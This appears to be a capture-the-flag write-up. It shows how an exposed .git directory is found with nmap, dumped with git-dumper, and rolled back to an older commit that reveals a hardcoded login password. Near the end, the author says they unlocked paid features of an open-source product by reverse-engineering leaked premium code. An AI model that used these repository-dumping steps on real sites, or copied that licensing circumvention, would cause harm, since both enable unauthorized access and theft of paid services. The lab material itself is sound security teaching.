Git-Happens
Target Details
IP Address: 10.10.49.172
Scan Services
Run nmap scan
$ nmap -sCV -Pn -oN nmap.txt [TARGET_IP]
$ cat nmap.txt
Nmap scan report for [TARGET_IP]
Host is up (0.40s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-git:
| [TARGET_IP]:80/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 14 22:04:47 2023 -- 1 IP address (1 host up) scanned in 118.95 secondsServices
HTTP
80
exposed .git directory with listing enabled
Clone git directory to local machine
Install git-dumper python tool
pip install git-dumperCreate directory for repo and change dir
mdkir git-repo && cd git-repoDownload git files
$ git-dumper http://10.10.49.172/.git/ .
[-] Testing http://10.10.49.172/.git/HEAD [200]
[-] Testing http://10.10.49.172/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.49.172/.git/ [200]
[-] Fetching http://10.10.49.172/.gitignore [404]
[-] http://10.10.49.172/.gitignore responded with status code 404
[-] Fetching http://10.10.49.172/.git/description [200]
[-] Fetching http://10.10.49.172/.git/index [200]
[-] Fetching http://10.10.49.172/.git/hooks/ [200]
[-] Fetching http://10.10.49.172/.git/refs/ [200]
[-] Fetching http://10.10.49.172/.git/config [200]
[-] Fetching http://10.10.49.172/.git/branches/ [200]
[-] Fetching http://10.10.49.172/.git/HEAD [200]
....
[-] Fetching http://10.10.49.172/.git/logs/refs/heads/master [200]
[-] Running git checkout .
Updated 7 paths from the indexLooking Through commits
Check commit logs
$ git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Thu Jul 23 22:22:16 2020 +0000
Update .gitlab-ci.yml
commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Fri Jul 24 00:21:25 2020 +0200
add gitlab-ci config to build docker file.
....
commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:17:43 2020 +0200
Made the login page, boss!
commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Mon Jul 20 20:46:28 2020 +0000
Initial commitFound commit hash when login page was created. commit hash: 395e087334d613d5e423cdf8f7be27196a360459
Change git HEAD to 395e087334d613d5e423cdf8f7be27196a360459 hash
git checkout 395e087334d613d5e423cdf8f7be27196a360459List directory files
$ ls
README.md css dashboard.html index.htmlWe might find hard coded passwords in html page.
$ cat index.html
....
<script>
function login() {
let form = document.getElementById("login-form");
console.log(form.elements);
let username = form.elements["username"].value;
let password = form.elements["password"].value;
if (
username === "admin" &&
password === "{{REDACTED}}"
) {
document.cookie = "login=1";
window.location.href = "/dashboard.html";
} else {
document.getElementById("error").innerHTML =
"INVALID USERNAME OR PASSWORD!";
}
}
</script>
</body>
</html> We've found hard coded password in index.html page. Submit password as flag.
Real World Analogy
From one of the open source project. The developers mistakenly commited paid services code block on their community edition git repo. I was able to reverse engineer the code block and avail those premium services π by making changes to the community edition codebase.
Conclusion
That was FUN!!
If you're gonna hard code credentials on client side, there is always someone who's gonna break the code.
.gitdirectory shouldn't be accessible to anyone. A minor server misconfiguration will allow attacker to find attack vector and exploit your infra/apps.
Last updated
Was this helpful?